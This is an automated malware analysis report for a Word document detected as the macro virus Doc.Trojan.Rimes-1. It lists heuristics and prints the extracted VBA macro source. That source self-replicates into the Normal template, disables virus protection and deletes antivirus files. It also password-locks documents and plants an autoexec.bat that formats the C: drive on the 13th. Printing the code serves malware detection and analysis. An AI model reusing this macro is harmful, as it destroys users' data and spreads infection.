MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic macro markers and a VBA AutoOpen macro that executes a 'Shell' command. The 'Infect' subroutine attempts to export the macro to 'c:\AuDioX.sys' and import it into other documents, indicating a macro-based infection mechanism. The 'RiMeS' subroutine appears to attempt to modify 'c:\autoexec.bat' and display a critical error message, suggesting potential system disruption.
Heuristics 5
-
ClamAV: Doc.Trojan.Rimes-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Rimes-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5340 bytes |
SHA-256: faea0c871dbf6e2ff4c737163fe53dde1c36d9155d9453e8e9563b2025dfb865 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AuDioX"
'CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG
'AuDio-X From CXG crew
'Hip-Hop For Ever
Sub Infect()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.VirusProtection = False
SetAttr NormalTemplate.FullName, vbNormal
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Application.VBE.ActiveVBProject.VBComponents("AuDioX").Export "c:\AuDioX.sys"
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "AuDioX" Then NormInstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "AuDioX" Then ActivInstall = True
Next i
If ActivInstall = True And NormInstall = False Then Set cxg = NormalTemplate.VBProject
ElseIf ActivInstall = False And NormInstall = True Then Set cxg = ActiveDocument.VBProject
cxg.VBComponents.Import ("c:\AuDioX.sys")
End Sub
Sub RiMeS()
'Contact me please at Writercxg@yahoo.com
On Error Resume Next
Dim BlackSunday
Application.DisplayStatusBar = False
Application.ScreenUpdating = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
BlackSunday = Day(Now())
If BlackSunday = 13 Then
Insert "cxg"
Kill "c:\windows\system\s*.dll"
Kill "c:\windows\system\r*.*"
MsgBox("Fatal error to kernel.", vbCritical, "Warning") = vbOK
Open "c:\autoexec.bat" For Random As auto
Print auto; "@echo off"
Print auto; "cls"
Print auto; "echo Microsoft Corp. 1983-1997 All rights reserved "
Print auto; "echo Goes preparation to renovation of your system files "
Print auto; "ECHO Please wait this can occupy several minutes"
Print auto; "format c: /u /c /s /q /autotest >nul"
Print auto; "echo ."
Print auto; "echo ."
Print auto; "Error at renovations of files"
Close auto
Tasks.ExitWindows
End If
End Sub
Sub AvKill()
On Error Resume Next
Kill "C:\Program Files\AntiViral Toolkit Pro\Avp32.exe"
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
Kill "C:\Program Files\Command Software\F-PROT95\*.dll"
Kill "C:\Program Files\Command Software\F-PROT95\*.exe"
Kill "C:\Program Files\McAfee\VirusScan95\Scan.dat"
Kill "C:\Program Files\McAfee\VirusScan\Scan.dat"
Kill "C:\Program Files\Norton AntiVirus\Viruscan.dat"
Kill "C:\Program Files\Symantec\Symevnt.386"
Kill "C:\Program Files\FindVirus\Findviru.drv"
Kill "C:\Program Files\Cheyenne\AntiVirus\*.dll"
Kill "C:\Program Files\Cheyenne\Common\Cshell.dll"
Kill "C:\PC-Cillin 95\Lpt$vpn.*"
Kill "C:\PC-Cillin 95\Scan32.dll"
Kill "C:\PC-Cillin 97\Lpt$vpn.*"
Kill "C:\PC-Cillin 97\Scan32.dll"
Kill "C:\eSafe\Protect\*.dll"
Kill "C:\f-macro\f-macro.exe"
Kill "C:\TBAVW95\Tbscan.sig"
Kill "C:\Tbavw95\Tb*.*"
Kill "C:\VS95\*.dll"
End Sub
Sub toolsmacro()
On Error Resume Next
MsgBox("Critical error,Word can't open macros.", vbCritical, "ERROR") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub filetemplates()
On Error Resume Next
MsgBox("Error 413:compilation error.", vbCritical, "ERROR") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsCustomize()
On Error Resume Next
MsgBox("Error 219:int()wrong variable string.", vbCritical, "ERROR") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ViewVBcode()
On Error Resume Next
MsgBox("Error 12:can't open VBA.", vbCritical, "Error") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub AutoOpen()
On Error R
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.